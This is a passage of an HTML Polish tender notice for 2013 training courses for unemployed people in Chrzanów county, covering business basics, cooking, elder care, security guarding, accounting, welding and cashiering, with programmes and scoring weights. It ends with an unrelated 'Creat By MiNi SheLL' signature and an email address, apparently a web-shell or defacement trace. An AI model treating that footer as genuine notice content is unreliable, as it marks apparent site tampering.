i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pierwsze kroki w biznesie - czyli organizacja i prowadzenie własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  60  osób bezrobotnych ( podzielonych na 4 grupy piętnastoosobowe)  w specjalności: Pierwsze kroki w biznesie - czyli organizacja i prowadzenie własnej firmy. 

Liczba osób w poszczególnych grupach może ulec  zmianie pod warunkiem, iż  szkoleniem zostanie objętych łącznie 60 osób.  
O ewentualnej zmianie liczby osób w poszczególnych grupach Wykonawca zostanie poinformowany nie później niż na 7 dni przed rozpoczęciem szkolenia. 

2.Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony 
do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. 
w poz. nr 9 załączniku nr 7 do SIWZ).  

3. Program szkolenia powinien obejmować 30  godzin dydaktycznych i zawierać następujące moduły:
a.Czynności związane z rozpoczynaniem działalności gospodarczej 
b.Elementy prawa gospodarczego 
c.System podatkowy w Polsce i formy ewidencji podatkowej 
d.Podstawy marketingu
e.Podstawy negocjacji 
f.Formy wsparcia dla  przedsiębiorców i osób rozpoczynających działalność gospodarczą
g.prowadzenie rozliczeń z ZUS
h.Analiza sytuacyjna przedsiębiorstwa

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

4.Sposób organizacji zajęć praktycznych: 

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%.  

5.Czas trwania: nie dłużej niż 5 kolejnych dni roboczych

6.Termin realizacji szkolenia: 

I grupa - II kwartał 2013r. 
II grupa - III kwartał 2013r. 
III grupa - III kwartał 2013r.
IV grupa - lV kwartał 2013r. 

7.  Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności:Kucharz małej gastronomii .  

2.Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  

3.Program szkolenia:  
a)Podstawowe wiadomości z zakresu gastronomii:
Składniki pokarmowe 
Sporządzanie  jadłospisów
Normy żywieniowe
Skutki nadmiaru i niedoboru składników pokarmowych
b)Technologie kulinarne potraw:
Zasady przeprowadzania obróbki wstępnej, termicznej
Porcjowanie, wykańczanie wyrobów
Zasady wykonywania dań mięsnych
Zasady  przygotowywania  dań garmażeryjnych
Rodzaje napojów i techniki ich sporządzania
Przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych w małej gastronomii; 
Maszyny, urządzenia i wyposażenie zakładów gastronomicznych
c)Przepisy BHP i HACCP w gastronomii
d)Technologia  wyrobu pizzy
Zasady usytuowania sprzętu
Produkty stosowane do wyrobu pizzy
Praktyczna nauka wyrobu pizzy
Dekorowanie potraw i stołu - podstawowe zasady
Formy obsługi klienta
Zajęcia praktyczne
Samodzielne przygotowywanie potraw z powierzonych surowców
Dekorowanie potraw, stołów
Napoje i drinki
Nowości kulinarne
Organizowanie i przygotowywanie imprez okolicznościowych.
h)Obsługa kasy fiskalnej
i)ABC własnej firmy

Liczba godz. 200, z czego zajęć praktycznych co najmniej   130. 

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników 
do pracy na stanowisku: Kucharz małej gastronomii , jednak ogólna liczba godzin nie  może przekroczyć 200. 

4.Sposób organizacji zajęć praktycznych: 

zajęcia praktyczne powinny  obejmować minimum 130 godzin.  
w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność obsługi  klienta.
w ramach zajęć praktycznych uczestnik nabędzie  umiejętność dekorowania potraw i stołów.
w ramach zajęć praktycznych  uczestnik nabędzie umiejętność samodzielnego przygotowywania potraw oraz drinków.
w  ramach zajęć praktycznych uczestnik nabędzie umiejętność opracowywania jadłospisów w zależności od rodzaju imprezy okolicznościowej. 
w ramach zajęć praktycznych uczestnik nabędzie umiejętność obsługi kasy fiskalnej.
Wykonawca zabezpiecza sprzęt techniczny , materiały do zajęć praktycznych oraz odzież roboczą. 

5.Czas trwania:    nie dłużej niż 35  kolejnych  dni roboczych 


6.Termin realizacji szkolenia:  II kwartał 2013r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 

7.Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów
 i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekun osoby starszej i niepełnosprawnej z językiem niemieckim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności:Opiekun osoby starszej i niepełnosprawnej z językiem niemieckim .  

2.Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz.nr 9 załączniku nr 7 do SIWZ).  


3.Program szkolenia:  musi obejmować 200 godz. dydaktycznych i obejmować co najmniej następujące moduły:
Rola i zadania opiekuna osób starszych ii niepełnosprawnych.
Fizjologia procesu starzenia. 
Zasady żywienia osób starszych i niepełnosprawnych .
Problemy zdrowotne, psychologiczne i społeczne ludzi starszych. 
Higiena i zabiegi pielęgnacyjne osób starszych i niepełnosprawnych
Opieka paliatywna w geriatrii  
Zasady udzielania pomocy przedlekarskiej 
Komunikacja, nawiązywanie właściwych kontaktów i wymiana informacji 
Język niemiecki - min. 50 godz. 

Liczba godz. 200, z czego zajęć praktycznych co najmniej   130. 

4.Sposób organizacji zajęć praktycznych: 
a.zajęcia praktyczne powinny  obejmować minimum 130 godzin.  
b.w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność wykonywania zabiegów pielęgnacyjnych  osób  starszych i niepełnosprawnych.
c.w ramach zajęć praktycznych uczestnik nabędzie  umiejętność opracowywania jadłospisów dla osób starszych  i niepełnosprawnych w zależności od rodzaju schorzeń .
d.w  ramach zajęć praktycznych uczestnik nabędzie umiejętność udzielania pierwszej pomocy przedlekarskiej.

5.Czas trwania:    nie dłużej niż 35  kolejnych  dni roboczych 


6.Termin realizacji szkolenia:  II / III kwartał 2013r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 
7.Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). 
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pracownik ochrony osób i mienia I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób w specjalności: Pracownik ochrony osób i mienia I stopnia. 
2.Miejsce organizacji szkolenia: 
Część praktyczna - preferowany  powiat chrzanowski.
Część teoretyczna - powiat chrzanowski.

W przypadku przeprowadzenia zajęć praktycznych poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w pozycji  
nr 9 załączniku nr 7 do SIWZ.   


3.Program szkolenia powinien obejmować min.  245 godzin dydaktycznych. Szkolenie powinno być zgodne z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia oraz przeprowadzone w oparciu o program opracowany  na podstawie  Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998r. 
w sprawie rodzajów dyplomów i świadectw wydanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji w zakresie ochrony osób i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składnia, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu  (  Dz. U. Nr 113 poz.  731.)

4.Czas trwania:  nie dłużej niż 40 dni roboczych 

5.Termin realizacji szkolenia: II / III kwartał 2013r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 

6.Inne postanowienia:

1)Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). 
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
2) Przedmiotem zamówienia jest przeprowadzenie szkolenia w specjalności: Pracownik ochrony osób i mienia I stopnia ( bez kosztów badań lekarskich i uzyskania licencji )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Księgowość komputerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 15 osób bezrobotnych  w specjalności: księgowość komputerowa.

Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. 
nr 9 załączniku nr 7 do SIWZ).  

Program szkolenia powinien obejmować 200 godzin dydaktycznych i zawierać następujące moduły:
UPROSZCZONE FORMY EWIDENCJI PODATKOWEJ
Uproszczone formy ewidencji podatkowej małych firm
Zasady ewidencji księgowej w formie podatkowej księgi przychodów i rozchodów
Wykorzystanie programów komputerowych do prowadzenia podatkowej księgi przychodów
 i rozchodów

WSPÓŁPRACA  PREDSIĘBIORSTWA Z ZUS
Zasady podlegania ubezpieczeniom społecznym 
Zasady wypełniania dokumentów zgłoszeniowych i rozliczeniowych
Zasady ustalania wymiaru składek na ubezpieczenia społeczne i zdrowotne
Obsługa programu  SYMFONIA

ROZLICZENIA Z PRACOWNIKAMI
Formy zatrudniania pracowników
Rodzaje wynagrodzeń
Zasady sporządzania listy płac

KSIĘGA HANDLOWA
Składniki majątku i źródła ich finansowania
Operacje gospodarcze
Konto księgowe
Konta wynikowe
Konta przychodów i rozchodów 
Koszty zespołu 4 i 5
Dokumentacja rozliczeń gotówkowych i bezgotówkowych
Środki trwałe
Rozrachunki z tytułu podatków
Bilans
Zestawienie obrotów i sald
Sprawozdania finansowe
Ustalenie wyniku finansowego


WYKORZYSTANIE PROGRAMÓW KOMPUTEROWYCH W ZAKRESIE EWIDENCJI KSIĘGOWEJ W MAŁYCH I ŚREDNICH PRZEDSIĘBIORSTWACH - CDN Optima oraz  SYMFONIA. 

Sposób organizacji zajęć praktycznych: 
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%.  
Wykonawca zapewnia dla każdego uczestnika dostęp do stanowiska komputerowego wyposażonego 
w komputerowy program finansowo-księgowy tj. CDN - Optima  oraz program SYMFONIA  ( przy jednym stanowisku może pracować max. jeden uczestnik). 
W ramach zajęć praktycznych uczestnicy nabędą następujące umiejętności:
prowadzenie uproszczonych form ewidencji
poprawne wypełnianie dokumentów rozliczeniowych z ZUS i US
sporządzanie listy płac
ustalanie wyniku finansowego
obsługa  programu Symfonia. 
obsługa programu CDN - Optima.
Razem 200 godzin
Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników do pracy w dziale księgowości, jednak ogólna liczba godzin nie  może przekroczyć 200. 


Czas trwania:  nie dłużej niż 35 dni robocze. 
Termin realizacji szkolenia:  III kwartał 2013r. 
Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). 
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodami MAG ( 135) i TIG ( 141)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  10 osób  bezrobotnych w specjalności : Spawacz blach
 i rur spoinami pachwinowymi metodami Mag i Tig.  

2.Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony
 do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w pozycji  
nr 9 załączniku nr 7 do SIWZ).  

3.Program szkolenia powinien obejmować min. 230 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

1.Sposób organizacji zajęć praktycznych;

zajęcia praktyczne mają być przeprowadzone zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach.
Wykonawca zapewnia odzież roboczą
Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

5.Czas trwania:  nie dłużej niż 35  kolejnych dni roboczych  


6.Termin realizacji szkolenia:  III kwartał 2013.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


7.Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). 
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
c)Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz Książeczkę Spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kasjer handlowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla 15 osób bezrobotnych  w specjalności: Kasjer handlowy.

2 Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony
 do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  

3.Program szkolenia powinien obejmować 30 godzin dydaktycznych i zawierać następujące moduły:

Podstawowe zagadnienia z zakresu podatku VAT
Kasa fiskalna jako element fiskalizacji w handlu i usługach, typy kas i ich działanie, materiały eksploatacyjne
Zajęcia praktyczne
Zasady bezpieczeństwa w obrocie produktami żywnościowymi  i przestrzegania zasad higieny  w procesie produkcji
Podstawowe zasady higieny ( HACCP )

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie  może przekroczyć 30. 

4.Sposób organizacji zajęć praktycznych:
zajęcia praktyczne powinny stanowić min. 50 % ogólnej liczby godzin objętych programem.  
w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność obsługi kasy fiskalnej oraz terminali płatniczych. 
w ramach zajęć praktycznych wykonawca musi zapewnić liczbę kas fiskalnych co najmniej równą liczbie uczestników ( na jedną kasę może przypadać tylko jeden uczestnik). 
Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

5.Czas trwania:  5 dni roboczych
6Termin realizacji szkolenia:  III kwartał 2013r. 

7.Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). 
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com